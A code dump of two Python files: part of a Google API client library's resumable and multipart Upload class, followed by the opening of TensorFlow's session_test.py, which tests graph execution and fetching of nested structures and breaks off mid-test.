auto_transfer=auto_transfer, http=http, **kwds)
self.__complete = False
self.__final_response = None
self.__mime_type = mime_type
self.__progress = 0
self.__server_chunk_granularity = None
self.__strategy = None
self.__total_size = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
self.total_size = total_size
@property
def progress(self):
return self.__progress
@classmethod
def FromFile(cls, filename, mime_type=None, auto_transfer=True, **kwds):
"""Create a new Upload object from a filename."""
path = os.path.expanduser(filename)
if not os.path.exists(path):
raise exceptions.NotFoundError('Could not find file %s' % path)
if not mime_type:
mime_type, _ = mimetypes.guess_type(path)
if mime_type is None:
raise exceptions.InvalidUserInputError(
'Could not guess mime type for %s' % path)
size = os.stat(path).st_size
return cls(open(path, 'rb'), mime_type, total_size=size,
close_stream=True, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, mime_type, total_size=None, auto_transfer=True,
**kwds):
"""Create a new Upload object from a stream."""
if mime_type is None:
raise exceptions.InvalidUserInputError(
'No mime_type specified for stream')
return cls(stream, mime_type, total_size=total_size,
close_stream=False, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromData(cls, stream, json_data, http, auto_transfer=None, **kwds):
"""Create a new Upload of stream from serialized json_data and http."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
if 'total_size' in kwds:
raise exceptions.InvalidUserInputError(
'Cannot override total_size on serialized Upload')
upload = cls.FromStream(stream, info['mime_type'],
total_size=info.get('total_size'), **kwds)
if isinstance(stream, io.IOBase) and not stream.seekable():
raise exceptions.InvalidUserInputError(
'Cannot restart resumable upload on non-seekable stream')
if auto_transfer is not None:
upload.auto_transfer = auto_transfer
else:
upload.auto_transfer = info['auto_transfer']
upload.strategy = RESUMABLE_UPLOAD
upload._Initialize( # pylint: disable=protected-access
http, info['url'])
upload.RefreshResumableUploadState()
upload.EnsureInitialized()
if upload.auto_transfer:
upload.StreamInChunks()
return upload
@property
def serialization_data(self):
self.EnsureInitialized()
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidDataError(
'Serialization only supported for resumable uploads')
return {
'auto_transfer': self.auto_transfer,
'mime_type': self.mime_type,
'total_size': self.total_size,
'url': self.url,
}
@property
def complete(self):
return self.__complete
@property
def mime_type(self):
return self.__mime_type
def __str__(self):
if not self.initialized:
return 'Upload (uninitialized)'
else:
return 'Upload with %d/%s bytes transferred for url %s' % (
self.progress, self.total_size or '???', self.url)
@property
def strategy(self):
return self.__strategy
@strategy.setter
def strategy(self, value):
if value not in (SIMPLE_UPLOAD, RESUMABLE_UPLOAD):
raise exceptions.UserError((
'Invalid value "%s" for upload strategy, must be one of '
'"simple" or "resumable".') % value)
self.__strategy = value
@property
def total_size(self):
return self.__total_size
@total_size.setter
def total_size(self, value):
self.EnsureUninitialized()
self.__total_size = value
def __SetDefaultUploadStrategy(self, upload_config, http_request):
"""Determine and set the default upload strategy for this upload.
We generally prefer simple or multipart, unless we're forced to
use resumable. This happens when any of (1) the upload is too
large, (2) the simple endpoint doesn't support multipart requests
and we have metadata, or (3) there is no simple upload endpoint.
Args:
upload_config: Configuration for the upload endpoint.
http_request: The associated http request.
Returns:
None.
"""
if upload_config.resumable_path is None:
self.strategy = SIMPLE_UPLOAD
if self.strategy is not None:
return
strategy = SIMPLE_UPLOAD
if (self.total_size is not None and
self.total_size > _RESUMABLE_UPLOAD_THRESHOLD):
strategy = RESUMABLE_UPLOAD
if http_request.body and not upload_config.simple_multipart:
strategy = RESUMABLE_UPLOAD
if not upload_config.simple_path:
strategy = RESUMABLE_UPLOAD
self.strategy = strategy
def ConfigureRequest(self, upload_config, http_request, url_builder):
"""Configure the request and url for this upload."""
# Validate total_size vs. max_size
if (self.total_size and upload_config.max_size and
self.total_size > upload_config.max_size):
raise exceptions.InvalidUserInputError(
'Upload too big: %s larger than max size %s' % (
self.total_size, upload_config.max_size))
# Validate mime type
if not util.AcceptableMimeType(upload_config.accept, self.mime_type):
raise exceptions.InvalidUserInputError(
'MIME type %s does not match any accepted MIME ranges %s' % (
self.mime_type, upload_config.accept))
self.__SetDefaultUploadStrategy(upload_config, http_request)
if self.strategy == SIMPLE_UPLOAD:
url_builder.relative_path = upload_config.simple_path
if http_request.body:
url_builder.query_params['uploadType'] = 'multipart'
self.__ConfigureMultipartRequest(http_request)
else:
url_builder.query_params['uploadType'] = 'media'
self.__ConfigureMediaRequest(http_request)
else:
url_builder.relative_path = upload_config.resumable_path
url_builder.query_params['uploadType'] = 'resumable'
self.__ConfigureResumableRequest(http_request)
def __ConfigureMediaRequest(self, http_request):
"""Configure http_request as a simple request for this upload."""
http_request.headers['content-type'] = self.mime_type
http_request.body = self.stream.read()
http_request.loggable_body = '<media body>'
def __ConfigureMultipartRequest(self, http_request):
"""Configure http_request as a multipart request for this upload."""
# This is a multipart/related upload.
msg_root = mime_multipart.MIMEMultipart('related')
# msg_root should not write out its own headers
setattr(msg_root, '_write_headers', lambda self: None)
# attach the body as one part
msg = mime_nonmultipart.MIMENonMultipart(
*http_request.headers['content-type'].split('/'))
msg.set_payload(http_request.body)
msg_root.attach(msg)
# attach the media as the second part
msg = mime_nonmultipart.MIMENonMultipart(*self.mime_type.split('/'))
msg['Content-Transfer-Encoding'] = 'binary'
msg.set_payload(self.stream.read())
msg_root.attach(msg)
# NOTE: We encode the body, but can't use
# `email.message.Message.as_string` because it prepends
# `> ` to `From ` lines.
fp = six.BytesIO()
if six.PY3:
generator_class = email_generator.BytesGenerator
else:
generator_class = email_generator.Generator
g = generator_class(fp, mangle_from_=False)
g.flatten(msg_root, unixfrom=False)
http_request.body = fp.getvalue()
multipart_boundary = msg_root.get_boundary()
http_request.headers['content-type'] = (
'multipart/related; boundary=%r' % multipart_boundary)
if isinstance(multipart_boundary, six.text_type):
multipart_boundary = multipart_boundary.encode('ascii')
body_components = http_request.body.split(multipart_boundary)
headers, _, _ = body_components[-2].partition(b'\n\n')
body_components[-2] = b'\n\n'.join([headers, b'<media body>\n\n--'])
http_request.loggable_body = multipart_boundary.join(body_components)
def __ConfigureResumableRequest(self, http_request):
http_request.headers['X-Upload-Content-Type'] = self.mime_type
if self.total_size is not None:
http_request.headers[
'X-Upload-Content-Length'] = str(self.total_size)
def RefreshResumableUploadState(self):
"""Talk to the server and refresh the state of this resumable upload.
Returns:
Response if the upload is complete.
"""
if self.strategy != RESUMABLE_UPLOAD:
return
self.EnsureInitialized()
refresh_request = http_wrapper.Request(
url=self.url, http_method='PUT',
headers={'Content-Range': 'bytes */*'})
refresh_response = http_wrapper.MakeRequest(
self.http, refresh_request, redirections=0,
retries=self.num_retries)
range_header = self._GetRangeHeaderFromResponse(refresh_response)
if refresh_response.status_code in (http_client.OK,
http_client.CREATED):
self.__complete = True
self.__progress = self.total_size
self.stream.seek(self.progress)
# If we're finished, the refresh response will contain the metadata
# originally requested. Cache it so it can be returned in
# StreamInChunks.
self.__final_response = refresh_response
elif refresh_response.status_code == http_wrapper.RESUME_INCOMPLETE:
if range_header is None:
self.__progress = 0
else:
self.__progress = self.__GetLastByte(range_header) + 1
self.stream.seek(self.progress)
else:
raise exceptions.HttpError.FromResponse(refresh_response)
def _GetRangeHeaderFromResponse(self, response):
return response.info.get('Range', response.info.get('range'))
def InitializeUpload(self, http_request, http=None, client=None):
"""Initialize this upload from the given http_request."""
if self.strategy is None:
raise exceptions.UserError(
'No upload strategy set; did you call ConfigureRequest?')
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
if self.strategy != RESUMABLE_UPLOAD:
return
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
self.EnsureUninitialized()
http_response = http_wrapper.MakeRequest(http, http_request,
retries=self.num_retries)
if http_response.status_code != http_client.OK:
raise exceptions.HttpError.FromResponse(http_response)
self.__server_chunk_granularity = http_response.info.get(
'X-Goog-Upload-Chunk-Granularity')
url = http_response.info['location']
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
return self.StreamInChunks()
else:
return http_response
def __GetLastByte(self, range_header):
_, _, end = range_header.partition('-')
# TODO(craigcitro): Validate start == 0?
return int(end)
def __ValidateChunksize(self, chunksize=None):
if self.__server_chunk_granularity is None:
return
chunksize = chunksize or self.chunksize
if chunksize % self.__server_chunk_granularity:
raise exceptions.ConfigurationValueError(
'Server requires chunksize to be a multiple of %d',
self.__server_chunk_granularity)
def __StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Helper function for StreamMedia / StreamInChunks."""
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidUserInputError(
'Cannot stream non-resumable upload')
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
# final_response is set if we resumed an already-completed upload.
response = self.__final_response
send_func = self.__SendChunk if use_chunks else self.__SendMediaBody
if use_chunks:
self.__ValidateChunksize(self.chunksize)
self.EnsureInitialized()
while not self.complete:
response = send_func(self.stream.tell(),
additional_headers=additional_headers)
if response.status_code in (http_client.OK, http_client.CREATED):
self.__complete = True
break
self.__progress = self.__GetLastByte(response.info['range'])
if self.progress + 1 != self.stream.tell():
# TODO(craigcitro): Add a better way to recover here.
raise exceptions.CommunicationError(
'Failed to transfer all bytes in chunk, upload paused at '
'byte %d' % self.progress)
self._ExecuteCallback(callback, response)
if self.__complete and hasattr(self.stream, 'seek'):
current_pos = self.stream.tell()
self.stream.seek(0, os.SEEK_END)
end_pos = self.stream.tell()
self.stream.seek(current_pos)
if current_pos != end_pos:
raise exceptions.TransferInvalidError(
'Upload complete with %s additional bytes left in stream' %
(int(end_pos) - int(current_pos)))
self._ExecuteCallback(finish_callback, response)
return response
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this resumable upload in a single request.
Args:
callback: Progress callback function with inputs
(http_wrapper.Response, transfer.Upload)
finish_callback: Final callback function with inputs
(http_wrapper.Response, transfer.Upload)
additional_headers: Dict of headers to include with the upload
http_wrapper.Request.
Returns:
http_wrapper.Response of final response.
"""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers, use_chunks=False)
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this (resumable) upload in chunks."""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers)
def __SendMediaRequest(self, request, end):
"""Request helper function for SendMediaBody & SendChunk."""
response = http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
if response.status_code not in (http_client.OK, http_client.CREATED,
http_wrapper.RESUME_INCOMPLETE):
# We want to reset our state to wherever the server left us
# before this failed request, and then raise.
self.RefreshResumableUploadState()
raise exceptions.HttpError.FromResponse(response)
if response.status_code == http_wrapper.RESUME_INCOMPLETE:
last_byte = self.__GetLastByte(
self._GetRangeHeaderFromResponse(response))
if last_byte + 1 != end:
self.stream.seek(last_byte)
return response
def __SendMediaBody(self, start, additional_headers=None):
"""Send the entire media stream in a single request."""
self.EnsureInitialized()
if self.total_size is None:
raise exceptions.TransferInvalidError(
'Total size must be known for SendMediaBody')
body_stream = stream_slice.StreamSlice(
self.stream, self.total_size - start)
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if start == self.total_size:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
range_string = 'bytes %s-%s/%s' % (start, self.total_size - 1,
self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, self.total_size)
def __SendChunk(self, start, additional_headers=None):
"""Send the specified chunk."""
self.EnsureInitialized()
no_log_body = self.total_size is None
if self.total_size is None:
# For the streaming resumable case, we need to detect when
# we're at the end of the stream.
body_stream = buffered_stream.BufferedStream(
self.stream, start, self.chunksize)
end = body_stream.stream_end_position
if body_stream.stream_exhausted:
self.__total_size = end
# TODO: Here, change body_stream from a stream to a string object,
# which means reading a chunk into memory. This works around
# https://code.google.com/p/httplib2/issues/detail?id=176 which can
# cause httplib2 to skip bytes on 401's for file objects.
# Rework this solution to be more general.
# pylint: disable=redefined-variable-type
body_stream = body_stream.read(self.chunksize)
else:
end = min(start + self.chunksize, self.total_size)
body_stream = stream_slice.StreamSlice(self.stream, end - start)
# TODO(craigcitro): Think about clearer errors on "no data in
# stream".
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if no_log_body:
# Disable logging of streaming body.
# TODO: Remove no_log_body and rework as part of a larger logs
# refactor.
request.loggable_body = '<media body>'
if self.total_size is None:
# Streaming resumable upload case, unknown total size.
range_string = 'bytes %s-%s/*' % (start, end - 1)
elif end == start:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
# Normal resumable upload case with known sizes.
range_string = 'bytes %s-%s/%s' % (start, end - 1, self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, end)
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
@test_util.with_c_api
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2
})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config.session_inter_op_thread_pool) - 1)
with session.Session(config=config) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
if ops._USE_C_API:
return # No shape registration for 'ConstructionFails'
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEquals(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEquals(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
